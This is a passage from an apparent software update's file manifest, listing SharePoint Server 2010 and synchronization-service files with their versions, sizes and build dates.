mmsevent.dll.mui| 4.0.2450.49| 46,656| 11-Sep-2018| 05:22 \nmmsmaad.dll.amd64.bd43c831_eaf4_4096_bc94_bf6607110b53| mmsmaad.dll| 4.0.2450.49| 583,776| 11-Sep-2018| 05:22 \nmmsmads.dll.amd64.5107b60f_1418_4b38_9a41_4852c2460167| mmsmads.dll| 4.0.2450.49| 523,360| 11-Sep-2018| 05:22 \nmmsmaed.dll.amd64.f9ae12a6_b10b_4e64_9016_cf62e1b0534b| mmsmaed.dll| 4.0.2450.49| 495,712| 11-Sep-2018| 05:22 \nmmsmaext.dll.amd64.70c9c758_1367_4f9c_abd6_65b0137cffcb| mmsmaext.dll| 4.0.2450.49| 473,696| 11-Sep-2018| 05:22 \nmmsmafim.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| mmsmafim.dll| 4.0.2450.49| 84,576| 11-Sep-2018| 05:22 \nmmsmaip.dll.amd64.0a1ff8f6_2a7a_48ff_97ed_015dafad8e34| mmsmaip.dll| 4.0.2450.49| 529,504| 11-Sep-2018| 05:22 \nmmsmaxml.dll.amd64.1843e542_3f71_4852_a7b7_3b6c9eb5862b| mmsmaxml.dll| 4.0.2450.49| 427,616| 11-Sep-2018| 05:22 \nmmsperf.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsperf.dll| 4.0.2450.49| 23,648| 11-Sep-2018| 05:22 \nmmsperf.h.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsperf.h| | 915| 07-Sep-2018| 03:39 \nmmsperf.ini.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsperf.ini| | 1,228| 07-Sep-2018| 03:39 \nmmsps.dll.amd64.a6879a20_2b96_4c71_991d_33c78ca00320| mmsps.dll| 4.0.2450.49| 178,264| 11-Sep-2018| 05:22 \nmmsscpth.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsscpth.dll| 4.0.2450.49| 3,052,128| 11-Sep-2018| 05:22 \nmmsscrpt.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsscrpt.exe| 4.0.2450.49| 164,960| 11-Sep-2018| 05:22 \nmmsscrpt.exe.config.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsscrpt.exe.config| | 2,406| 07-Sep-2018| 03:39 \nmmsserverrcw.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mmsserverrcw.dll| 4.0.2450.49| 39,528| 11-Sep-2018| 05:22 \nmmsuihlp.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mmsuihlp.dll| 4.0.2450.49| 953,952| 11-Sep-2018| 05:22 \nmmsuishell.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mmsuishell.dll| 4.0.2450.49| 199,272| 11-Sep-2018| 05:22 \nmmsutils.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsutils.dll| 4.0.2450.49| 231,008| 11-Sep-2018| 05:22 \nmmswmi.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmswmi.dll| 4.0.2450.49| 150,624| 11-Sep-2018| 05:22 \nmmswmi.mof.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmswmi.mof| | 8,536| 07-Sep-2018| 03:39 \nmmswmix.mof.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmswmi-x.mof| | 978| 07-Sep-2018| 03:39 \nmngctpub.apx| managectpublishing.aspx| | 5,453| 11-Sep-2018| 06:14 \nmngfedl.apx| managefederatedlocations.aspx| | 15,986| 07-Sep-2018| 04:12 \nmngrules.apx| managecrawlrules.aspx| | 9,937| 07-Sep-2018| 04:12 \nmngshr.apx| managesitehitrules.aspx| | 6,352| 07-Sep-2018| 04:12 \nmngtypes.apx| managefiletypes.aspx| | 12,233| 07-Sep-2018| 04:12 \nmobileresults_spx| mobileresults.aspx| | 3,008| 07-Sep-2018| 04:12 \nmobilesearch_spx| mobilesearch.aspx| | 3,006| 07-Sep-2018| 04:12 \nmodwrkflip.aspx| modwrkflip.aspx| | 2,335| 11-Sep-2018| 02:11 \nmprop.apx| managedproperty.aspx| | 23,621| 07-Sep-2018| 04:12 \nmsdym7.dll_osssearch| msdym7.dll| 14.0.7005.1000| 2,593,344| 11-Sep-2018| 06:00 \nmsdym7.lex_osssearch| msdym7.lex| 14.0.7140.5000| 425,472| 11-Sep-2018| 06:00 \nmsft.metads.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservices.dll| 4.0.2450.49| 14,480| 11-Sep-2018| 05:22 \nmsft.metads.host.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservices.host.dll| 4.0.0.0| 12,440| 11-Sep-2018| 05:22 \nmsft.metads.host.gac.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservices.host.dll| 4.0.0.0| 12,440| 11-Sep-2018| 05:22 \nmsft.metads.impl.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservices.impl.dll| 4.0.2450.49| 84,632| 11-Sep-2018| 05:22 \nmsft.metads.xml.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservices.xml| | 156| 07-Sep-2018| 03:39 \nmsft.metadsex.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservicesex.dll| 4.0.0.0| 60,048| 11-Sep-2018| 05:22 \nmsft.metadsex.xml.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservicesex.xml| | 265,937| 07-Sep-2018| 03:39 \nmsitedefault.aspx| default.aspx| | 3,768| 07-Sep-2018| 04:17 \nmsitehostcontent.aspx| personcontent.aspx| | 10,439| 07-Sep-2018| 04:17 \nmsitehostdefault.aspx| default.aspx| | 3,871| 07-Sep-2018| 04:17 \nmsitehostdiscussion.aspx| discussion.aspx| | 2,992| 07-Sep-2018| 04:17 \nmsitehostorgview.aspx| organizationview.aspx| | 8,916| 07-Sep-2018| 04:17 \nmsitehostperson.aspx| person.aspx| | 10,207| 07-Sep-2018| 04:17 \nmsitehosttagp.aspx| tagprofile.aspx| | 3,771| 07-Sep-2018| 04:17 \nmsitehostxmlonet_xml| onet.xml| | 17,265| 07-Sep-2018| 04:17 \nmsitepublic.aspx| public.aspx| | 1,974| 07-Sep-2018| 04:17 \nmsscpi.dll| msscpi.dll| 14.0.7167.5000| 2,153,192| 11-Sep-2018| 06:39 \nmssdmn.exe| mssdmn.exe| 14.0.7005.1000| 791,144| 11-Sep-2018| 06:39 \nmssearch.exe| mssearch.exe| 14.0.7005.1000| 524,888| 11-Sep-2018| 06:39 \nmsslad.dll| msslad.dll| 14.0.7005.1000| 432,232| 11-Sep-2018| 06:39 \nmssph.dll| mssph.dll| 14.0.7121.5000| 1,678,520| 11-Sep-2018| 06:39 \nmssrch.dll| mssrch.dll| 14.0.7006.1000| 4,988,520| 11-Sep-2018| 06:39 \nmsswelcm.apx| msswelcome.aspx| | 8,700| 07-Sep-2018| 04:12 \nmstlay_mysite.master| mysite.master| | 22,685| 07-Sep-2018| 04:17 \nmstr4tsc.dll| mstr4tsc.dll| 14.0.7005.1000| 107,600| 11-Sep-2018| 04:42 \nmsvcm90.dll.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| msvcm90.dll| 9.00.21022.8| 245,248| 07-Sep-2018| 03:39 \nmsvcp90.dll.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| msvcp90.dll| 9.00.21022.8| 851,456| 07-Sep-2018| 03:39 \nmsvcr90.dll.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| msvcr90.dll| 9.00.21022.8| 627,200| 07-Sep-2018| 03:39 \nmswb7.dll_osssearch| mswb7.dll| 14.0.7005.1000| 332,424| 11-Sep-2018| 06:01 \nmswb70011.dll_osssearch| mswb70011.dll| 14.0.7005.1000| 1,092,752| 11-Sep-2018| 06:01 \nmswb7001e.dll_osssearch| mswb7001e.dll| 14.0.7005.1000| 1,092,752| 11-Sep-2018| 06:01 \nmswb70404.dll_osssearch| mswb70404.dll| 14.0.7005.1000| 1,092,736| 11-Sep-2018| 06:01 \nmswb70804.dll_osssearch| mswb70804.dll| 14.0.7005.1000| 1,092,736| 11-Sep-2018| 06:01 \nmultilangtemplates.ascx| transmgmtlibtemplates.ascx| | 3,243| 11-Sep-2018| 02:11 \nmv.dsml.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mv.dsml| | 42,567| 07-Sep-2018| 03:39 \nmvdesigner.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mvdesigner.dll| 4.0.2450.49| 166,504| 11-Sep-2018| 05:22 \nmvviewer.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mvviewer.dll| 4.0.2450.49| 100,960| 11-Sep-2018| 05:22 \nmycontactlinks.aspx| mycontactlinks.aspx| | 9,101| 07-Sep-2018| 04:17 \nmydwpactivitytracker_dwp| activitytracker.dwp| | 560| 07-Sep-2018| 04:17 \nmydwpaskmeabout_dwp| askmeabout.dwp| | 539| 07-Sep-2018| 04:17 \nmydwpcontactlinks_dwp| contactlinks.dwp| | 556| 07-Sep-2018| 04:17 \nmydwpmembershipdocs_dwp| membershipdocs.dwp| | 802| 07-Sep-2018| 04:17 \nmydwpmemberships_dwp| memberships.dwp| | 833| 07-Sep-2018| 04:17 \nmydwpmydocs_dwp| mydocs.dwp| | 757| 07-Sep-2018| 04:17 \nmydwpmypics_dwp| mypics.dwp| | 638| 07-Sep-2018| 04:17 \nmydwpmyworks_dwp| myworks.dwp| | 533| 07-Sep-2018| 04:17 \nmydwpowacalendar_dwp| owacalendar.dwp| | 534| 07-Sep-2018| 04:17 \nmydwpowacontacts_dwp| owacontacts.dwp| | 534| 07-Sep-2018| 04:17 \nmydwpowainbox_dwp| owainbox.dwp| | 550| 07-Sep-2018| 04:17 \nmydwpowatasks_dwp| owatasks.dwp| | 525| 07-Sep-2018| 04:17 \nmydwpowa_dwp| owa.dwp| | 510| 07-Sep-2018| 04:17 \nmydwpquicklinks_dwp| quicklinks.dwp| | 526| 07-Sep-2018| 04:17 \nmydwpsiteframer_dwp| siteframer.dwp| | 909| 07-Sep-2018| 04:17 \nmydwpsocialcomment_dwp| socialcomment.dwp| | 579| 07-Sep-2018| 04:17 \nmydwptagcloud_dwp| tagcloud.dwp| | 562| 07-Sep-2018| 04:17 \nmydwpwelcomewebpart_dwp| welcomewebpart.dwp| | 613| 07-Sep-2018| 04:17 \nmyinfo.aspx| myinfo.aspx| | 1,500| 07-Sep-2018| 04:17 \nmylinks_ascx| mylinks.ascx| | 1,401| 07-Sep-2018| 04:17 \nmymemberships.aspx| mymemberships.aspx| | 8,926| 07-Sep-2018| 04:17 \nmyquicklinks.aspx| myquicklinks.aspx| | 2,791| 07-Sep-2018| 04:17 \nmysite.aspx| mysite.aspx| | 4,659| 07-Sep-2018| 04:17 \nmysiteheader.aspx| mysiteheader.aspx| | 1,122| 07-Sep-2018| 04:17 \nmysitexmlonet_xml| onet.xml| | 13,569| 07-Sep-2018| 04:17 \nmystlink_ascx| mysitelink.ascx| | 1,379| 07-Sep-2018| 04:17 \nmystmbl_ascx| mysitemobile.ascx| | 9,731| 07-Sep-2018| 04:17 \nmystredr_ascx| mysiteredirection.ascx| | 254| 07-Sep-2018| 04:17 \nmytopnav_ascx| mysitetopnavigation.ascx| | 5,230| 07-Sep-2018| 04:17 \nnatlang6.dll_osssearch| naturallanguage6.dll| 14.0.7132.5000| 1,495,248| 11-Sep-2018| 06:01 \nnewdocset.aspx| newdocset.aspx| | 3,250| 11-Sep-2018| 02:11 \nnewffast_aspx| newform.aspx| | 18,531| 07-Sep-2018| 04:17 \nnewform.asx_xlatelist| newform.aspx| | 14,048| 11-Sep-2018| 02:11 \nnewmultilang.aspx| newtranslationmanagement.aspx| | 63,501| 11-Sep-2018| 02:11 \nnewprofserviceappcreated.aspx| newprofileserviceapplicationcreated.aspx| | 2,613| 07-Sep-2018| 04:17 \nnewprofserviceappsettings.aspx| newprofileserviceapplicationsettings.aspx| | 12,674| 07-Sep-2018| 04:17 \nnewsv3artc2.aspx| article2.aspx| | 286| 07-Sep-2018| 04:17 \nnewsv3home.aspx| default.aspx| | 286| 07-Sep-2018| 04:17 \nnewsv3xmlonet_xml| onet.xml| | 8,711| 07-Sep-2018| 04:17 \nnewvarst.asx| newvariationsite.aspx| | 10,576| 07-Sep-2018| 11:41 \nnewxlrpt.aspx| createworkbook.aspx| | 8,961| 07-Sep-2018| 04:17 \nnhomev3art.aspx| article1.aspx| | 286| 07-Sep-2018| 04:17 \nnhomev3home.aspx| default.aspx| | 286| 07-Sep-2018| 04:17 \nnhomev3xmlonet_xml| onet.xml| | 26,154| 07-Sep-2018| 04:17 \nnocrwl.asx| nocrawlsettings.aspx| | 8,252| 07-Sep-2018| 11:41 \nnotesmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| notesmapropertypages.dll| 4.0.2450.49| 121,464| 11-Sep-2018| 05:22 \nnotessiset.apx| notesserviceinstancesettings.aspx| | 5,346| 07-Sep-2018| 04:12 \nnoteswebservice.dll.oss| noteswebservice.dll| 14.0.7005.1000| 972,888| 11-Sep-2018| 06:39 \nntma.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntma.dll| 4.0.2450.49| 55,896| 11-Sep-2018| 05:22 \nntmaattributeinclusionlist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntmaattributeinclusionlist.xml| | 187| 07-Sep-2018| 03:39 \nntmamandatoryattributelist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntmamandatoryattributelist.xml| | 53| 07-Sep-2018| 03:39 \nntmamandatoryobjectclasslist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntmamandatoryobjectclasslist.xml| | 39| 07-Sep-2018| 03:39 \nntmaobjectclassinclusionlist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntmaobjectclassinclusionlist.xml| | 122| 07-Sep-2018| 03:39 \nntuisettinginit.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntuisettinginit.xml| | 591| 07-Sep-2018| 03:39 \nnwsarch.aspx| newsarchive.aspx| | 2,725| 07-Sep-2018| 04:17 \nobjectlauncher.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| objectlauncher.dll| 4.0.2450.49| 12,912| 11-Sep-2018| 05:22 \nobjectschemaconfigpopulate.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objectschemaconfigpopulate.sql| | 110,847| 07-Sep-2018| 03:39 \nobjectschema_storedprocedures.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objectschema_storedprocedures.sql| | 77,710| 11-Sep-2018| 05:22 \nobjects_indexes.unfiltered.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objects_indexes.unfiltered.sql| | 1,055| 07-Sep-2018| 03:39 \nobjects_storedprocedures.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objects_storedprocedures.moss.sql|objects_storedprocedures.sql| | 386,449| 11-Sep-2018| 05:22 \nobjects_tables.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objects_tables.sql| | 48,474| 07-Sep-2018| 03:39 \nobjects_views.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objects_views.sql| | 21,219| 07-Sep-2018| 03:39 \nobjectviewers.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| objectviewers.dll| 4.0.2450.49| 207,464| 11-Sep-2018| 05:22 \nocset.asx| objectcachesettings.aspx| | 11,348| 07-Sep-2018| 11:41 \nodc3232.png| | | 469| 11-Sep-2018| 01:53 \nodcw2020.png| | | 325| 11-Sep-2018| 01:53 \noffice.odf| office.odf| 14.0.7226.5000| 4,310,296| 12-Feb-2019| 05:08 \nofficialfiledisco.aspx| officialfiledisco.aspx| | 1,422| 11-Sep-2018| 02:11 \nofficialfilewsdl.aspx| officialfilewsdl.aspx| | 13,606| 11-Sep-2018| 02:11 \noffxml.dll| offxml.dll| 14.0.7248.5000| 528,544| 14-Apr-2020| 12:32 \nolapfilter_dwp| olapfilter.dwp| | 621| 07-Sep-2018| 04:17 \noperations.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| operations.dll| 4.0.2450.49| 76,392| 11-Sep-2018| 05:22 \norgadminedit.aspx| orgadminedit.aspx| | 2,550| 07-Sep-2018| 04:17 \norgnew.aspx| orgnew.aspx| | 2,573| 07-Sep-2018| 04:17 \nosafehtm.dll| osafehtm.dll| 14.0.7104.5000| 156,344| 11-Sep-2018| 06:55 \nosrvadm.rsx| officeserveradmin.resx| | 12,878| 11-Sep-2018| 06:14 \nosrvadml.xml| officeserveradminlinks.xml| | 1,505| 11-Sep-2018| 06:14 \nosrvcore.rsx| osrvcore.resx| | 15,662| 11-Sep-2018| 06:14 \nosrvintl.dll| microsoft.office.server.intl.dll| 14.0.7002.1000| 236,192| 11-Sep-2018| 06:14 \noss.cswp.sts_dwp| contentsourcesstatus.dwp| | 671| 07-Sep-2018| 04:12 \noss.dwpadvancedsearchbox_dwp| advancedsearchbox.dwp| | 2,798| 07-Sep-2018| 04:12 \noss.dwpcoreresults_dwp| searchcoreresults.webpart| | 1,564| 07-Sep-2018| 04:12 \noss.dwpdualchinesesearch_dwp| dualchinesesearch.dwp| | 1,501| 07-Sep-2018| 04:12 \noss.dwppeoplecoreresults_dwp| peoplesearchcoreresults.webpart| | 1,156| 07-Sep-2018| 04:12 \noss.dwpsearchbox_dwp| searchbox.dwp| | 1,230| 07-Sep-2018| 04:12 \noss.dwpsearchpaging_dwp| searchpaging.dwp| | 767| 07-Sep-2018| 04:12 \noss.dwpsearchstats_dwp| searchstats.dwp| | 626| 07-Sep-2018| 04:12 \noss.dwpsearchsummary_dwp| searchsummary.dwp| | 632| 07-Sep-2018| 04:12 \noss.farm1.sys_dwp| farmsystemstatus.dwp| | 659| 07-Sep-2018| 04:12 \noss.farmsa.lst_dwp| farmsearchapplications.dwp| | 680| 07-Sep-2018| 04:12 \noss.health.crawlprocessingperactivity.aspx| crawlprocessingperactivity.aspx| | 7,390| 07-Sep-2018| 04:12 \noss.health.crawlprocessingpercomponent.aspx| crawlprocessingpercomponent.aspx| | 10,732| 07-Sep-2018| 04:12 \noss.health.crawlqueue.aspx| crawlqueue.aspx| | 4,689| 07-Sep-2018| 04:12 \noss.health.crawlratepercontentsource.aspx| crawlratepercontentsource.aspx| | 5,782| 07-Sep-2018| 04:12 \noss.health.crawlratepertype.aspx| crawlratepertype.aspx| | 8,895| 07-Sep-2018| 04:12 \noss.health.querylatency.aspx| querylatency.aspx| | 5,500| 07-Sep-2018| 04:12 \noss.health.querylatencytrend.aspx| querylatencytrend.aspx| | 6,335| 07-Sep-2018| 04:12 \noss.health.sharepointbackendquerylatency.aspx| sharepointbackendquerylatency.aspx| | 7,595| 07-Sep-2018| 04:12 \noss.peoplerefinement_dwp| peoplerefinement.webpart| | 1,008| 07-Sep-2018| 04:12 \noss.querysuggestions_dwp| querysuggestions.webpart| | 1,226| 07-Sep-2018| 04:12 \noss.refinement_dwp| refinement.webpart| | 990| 07-Sep-2018| 04:12 \noss.sa1.sys_dwp| searchappsystemstatus.dwp| | 664| 07-Sep-2018| 04:12 \noss.searchactionlinks_dwp| searchactionlinks.webpart| | 1,212| 07-Sep-2018| 04:12 \noss.searchbestbets_dwp| searchbestbets.webpart| | 1,345| 07-Sep-2018| 04:12 \noss.searchresults_aspx| osssearchresults.aspx| | 9,846| 11-Sep-2018| 06:39 \noss.shcuts.sys_dwp| searchappshortcutslist.dwp| | 699| 07-Sep-2018| 04:12 \noss.srchconnectorgenerator_aspx| srchconnectorgenerator.aspx| | 277| 07-Sep-2018| 04:12 \noss.srchrss_aspx| srchrss.aspx| | 2,334| 07-Sep-2018| 04:12 \noss.stplg1_dwp| searchtopology.dwp| | 645| 07-Sep-2018| 04:12 \noss.summaryresults_dwp| summaryresults.webpart| | 1,304| 07-Sep-2018| 04:12 \noss.swpf.advancedsearchbox_dwp| advancedsearchbox.dwp| | 2,798| 07-Sep-2018| 04:12 \noss.swpf.coreresults_dwp| searchcoreresults.webpart| | 1,564| 07-Sep-2018| 04:12 \noss.swpf.dualchinese_search_dwp| dualchinesesearch.dwp| | 1,501| 07-Sep-2018| 04:12 \noss.swpf.peoplecoreresults_dwp| peoplesearchcoreresults.webpart| | 1,156| 07-Sep-2018| 04:12 \noss.swpf.peoplerefinement_dwp| peoplerefinement.webpart| | 1,008| 07-Sep-2018| 04:12 \noss.swpf.querysuggestions_dwp| querysuggestions.webpart| | 1,226| 07-Sep-2018| 04:12 \noss.swpf.refinement_dwp| refinement.webpart| | 990| 07-Sep-2018| 04:12 \noss.swpf.searchactionlinks_dwp| searchactionlinks.webpart| | 1,212| 07-Sep-2018| 04:12 \noss.swpf.searchbestbets_dwp| searchbestbets.webpart| | 1,345| 07-Sep-2018| 04:12 \noss.swpf.searchbox_dwp| searchbox.dwp| | 1,230| 07-Sep-2018| 04:12 \noss.swpf.searchpaging_dwp| searchpaging.dwp| | 767| 07-Sep-2018| 04:12 \noss.swpf.searchstats_dwp| searchstats.dwp| | 626| 07-Sep-2018| 04:12 \noss.swpf.searchsummary_dwp| searchsummary.dwp| | 632| 07-Sep-2018| 04:12 \noss.swpf.summaryresults_dwp| summaryresults.webpart| | 1,304| 07-Sep-2018| 04:12 \noss.swpf.topanswer_dwp| topanswer.webpart| | 1,062| 07-Sep-2018| 04:12 \noss.tcscsearchresults_aspx| tcscsearchresults.aspx| | 34,468| 11-Sep-2018| 06:39 \noss.topanswer_dwp| topanswer.webpart| | 1,062| 07-Sep-2018| 04:12 \noss.webconfig.spss.xml| webconfig.spss.xml| | 9,813| 07-Sep-2018| 04:12 \npackagegeneration.aspx| packagegeneration.aspx| | 2,348| 07-Sep-2018| 03:31 \npageset.asx| pagesettings.aspx| | 26,881| 07-Sep-2018| 11:41 \npblyprovfile.xml| provisionedfiles.xml| | 10,455| 11-Sep-2018| 02:06 \npblyprovfile2.xml| provisionedfiles2.xml| | 2,434| 11-Sep-2018| 02:06 \npblyprovfile3.xml| provisionedfiles3.xml| | 443| 11-Sep-2018| 02:06 \npblyprovfile4.xml| provisionedfiles4.xml| | 304| 11-Sep-2018| 02:06 \npblyprovfile5.xml| provisionedfiles5.xml| | 384| 11-Sep-2018| 02:06 \npblyprovui.xml| provisionedui.xml| | 37,202| 11-Sep-2018| 02:06 \npdefaspx.xml| default.aspx| | 284| 07-Sep-2018| 11:41 \npeoplemosaic.aspx| peoplemosaic.aspx| | 2,639| 07-Sep-2018| 04:17 \npeople_aspx| people.aspx| | 286| 07-Sep-2018| 04:12 \npepfast_aspx| people.aspx| | 286| 07-Sep-2018| 04:12 \npepresults_aspx| peopleresults.aspx| | 284| 07-Sep-2018| 04:12 \npeprfast_aspx| peopleresults.aspx| | 284| 07-Sep-2018| 04:12 \nperson.asx_mobile| person.aspx| | 4,263| 07-Sep-2018| 04:17 \npersonaldefault.aspx| default.aspx| | 3,882| 07-Sep-2018| 04:17 \npersonalsites.aspx| personalsites.aspx| | 15,409| 07-Sep-2018| 04:17 \npersonalxmlonet_xml| onet.xml| | 9,836| 07-Sep-2018| 04:17 \npgfromdc.asx| pagefromdoclayout.aspx| | 6,711| 07-Sep-2018| 11:41 \npgvrinfo.asx| pageversioninfo.aspx| | 3,642| 07-Sep-2018| 11:41 \npkmexsph.dll_0001| pkmexsph.dll| 14.0.7005.1000| 574,040| 11-Sep-2018| 06:39 \nplrptcfg.asx| policyrptconfig.aspx| | 14,603| 11-Sep-2018| 02:11 \npltmplat.apx| pagelayouttemplate.aspx| | 1,270| 07-Sep-2018| 11:41 \npnstset.xml| navigationsitesettings.xml| | 2,941| 11-Sep-2018| 02:06 \npoliccts.aspx| policycts.aspx| | 12,028| 11-Sep-2018| 02:11 \npolicy.aspx| policy.aspx| | 9,048| 11-Sep-2018| 02:11 \npolicyconfig.aspx| policyconfig.aspx| | 10,146| 11-Sep-2018| 02:11 \npolicyfeatures.aspx| policyfeatures.aspx| | 4,824| 11-Sep-2018| 02:11 \npolicylist.aspx| policylist.aspx| | 6,222| 11-Sep-2018| 02:11 \npopupselector1.aspx| popupselector.aspx| | 9,606| 07-Sep-2018| 04:12 \nportal.dll| microsoft.sharepoint.portal.dll| 14.0.7254.5000| 5,025,488| 17-Jun-2020| 01:44 \nportal.dll_001| microsoft.sharepoint.portal.dll| 14.0.7254.5000| 5,025,488| 17-Jun-2020| 01:44 \nportal.js| portal.js| | 23,261| 11-Sep-2018| 06:47 \nportalapi.aspx| portalapi.aspx| | 1,355| 07-Sep-2018| 04:17 \nportaluiconfigurations.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| portaluiconfigurations.sql| | 24,857| 11-Sep-2018| 05:22 \npositionselector.ascx_1048638289| positionselector.ascx| | 1,875| 07-Sep-2018| 03:32 \nppldefault_aspx| people.aspx| | 16,945| 07-Sep-2018| 04:12 \npplresults_aspx| peopleresults.aspx| | 23,276| 07-Sep-2018| 04:12 \npplsearchres.aspx| peoplesearchresults.aspx| | 27,958| 07-Sep-2018| 04:12 \npreview.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| preview.dll| 4.0.2450.49| 318,048| 11-Sep-2018| 05:22 \nprm0006.bin_osssearch| prm0006.bin| 14.0.7104.5000| 7,062,016| 11-Sep-2018| 06:01 \nprm0007.bin_osssearch| prm0007.bin| 14.0.7135.5000| 11,625,984| 11-Sep-2018| 06:01 \nprm0009.bin_osssearch| prm0009.bin| 14.0.7157.5000| 6,131,200| 11-Sep-2018| 06:01 \nprm0013.bin_osssearch| prm0013.bin| 14.0.7153.5000| 9,650,688| 11-Sep-2018| 06:01 \nprm0015.bin_osssearch| prm0015.bin| 14.0.7153.5000| 8,056,320| 11-Sep-2018| 06:01 \nprm0019.bin_osssearch| prm0019.bin| 14.0.7140.5000| 8,751,104| 11-Sep-2018| 06:01 \nprofadminedit.aspx| profadminedit.aspx| | 2,554| 07-Sep-2018| 04:17 \nprofilebrowser_dwp| profilebrowser.dwp| | 644| 07-Sep-2018| 04:17 \nprofileimportexportservicedisco.aspx| profileimportexportservicedisco.aspx| | 1,046| 07-Sep-2018| 04:17 \nprofileimportexportservicewsdl.aspx| profileimportexportservicewsdl.aspx| | 23,058| 07-Sep-2018| 04:17 \nprofileredirect.aspx| profileredirect.aspx| | 1,429| 07-Sep-2018| 04:17 \nprofilesrp.sql| profilesrp.sql| | 1,114,429| 11-Sep-2018| 06:47 \nprofilesxmlonet_xml| onet.xml| | 7,028| 07-Sep-2018| 04:17 \nprofilesyncprovision.aspx| profilesynchronizationserviceprovisionpage.aspx| | 5,785| 07-Sep-2018| 04:17 \nprofilup.sql| profilup.sql| | 864,691| 11-Sep-2018| 06:47 \nprofmngr.aspx| profmngr.aspx| | 3,378| 07-Sep-2018| 04:17 \nprofnew.aspx| profnew.aspx| | 2,574| 07-Sep-2018| 04:17 \nproftemp.asx| businessdataprofiletemplate.aspx| | 4,513| 07-Sep-2018| 03:31 \nprojpg.apx| projectpage.aspx| | 6,182| 07-Sep-2018| 11:41 \nproperties3d.ascx_1048638289| properties3d.ascx| | 4,752| 07-Sep-2018| 03:32 \npropertiesadvanced.ascx_2060739507| propertiesadvanced.ascx| | 4,811| 07-Sep-2018| 03:32 \npropertiesadvanced.aspx_2060739507| propertiesadvanced.aspx| | 7,951| 07-Sep-2018| 03:32 \npropertiesaxis.ascx_1048638289| propertiesaxis.ascx| | 11,231| 07-Sep-2018| 03:32 \npropertiesbackground.ascx_1048638289| propertiesbackground.ascx| | 2,358| 07-Sep-2018| 03:32 \npropertiesdatalabel.ascx_1048638289| propertiesdatalabel.ascx| | 4,703| 07-Sep-2018| 03:32 \npropertiesdatamarker.ascx_1048638289| propertiesdatamarker.ascx| | 2,507| 07-Sep-2018| 03:32 \npropertiesinteractivityseries.ascx_1048638289| propertiesinteractivityseries.ascx| | 3,917| 07-Sep-2018| 03:32 \npropertieslegend.ascx_1048638289| propertieslegend.ascx| | 5,466| 07-Sep-2018| 03:32 \npropertiessizetype.ascx_1048638289| propertiessizetype.ascx| | 2,374| 07-Sep-2018| 03:32 \npropertiestheme.ascx_1048638289| propertiestheme.ascx| | 2,317| 07-Sep-2018| 03:32 \npropertiestitle.ascx_1048638289| propertiestitle.ascx| | 2,896| 07-Sep-2018| 03:32 \npropertypageconfig.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| propertypageconfig.xml| | 11,223| 07-Sep-2018| 03:39 \npropertysheetbase.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| propertysheetbase.dll| 4.0.2450.49| 416,368| 11-Sep-2018| 05:22 \nprov.xml| provisionedfiles.xml| | 1,180| 11-Sep-2018| 02:06 \nprov2.xml| provisionedfiles2.xml| | 1,196| 11-Sep-2018| 02:06 \nprovfile.xml| provisionedfiles.xml| | 4,738| 11-Sep-2018| 02:06 \nprovfl2.xml| provisionedfiles2.xml| | 511| 11-Sep-2018| 02:06 \nprovfl3.xml| provisionedfiles3.xml| | 704| 11-Sep-2018| 02:06 \nprovui.xml| provisionedui.xml| | 22,575| 11-Sep-2018| 02:06 \nproxy.aspx| proxy.aspx| | 492| 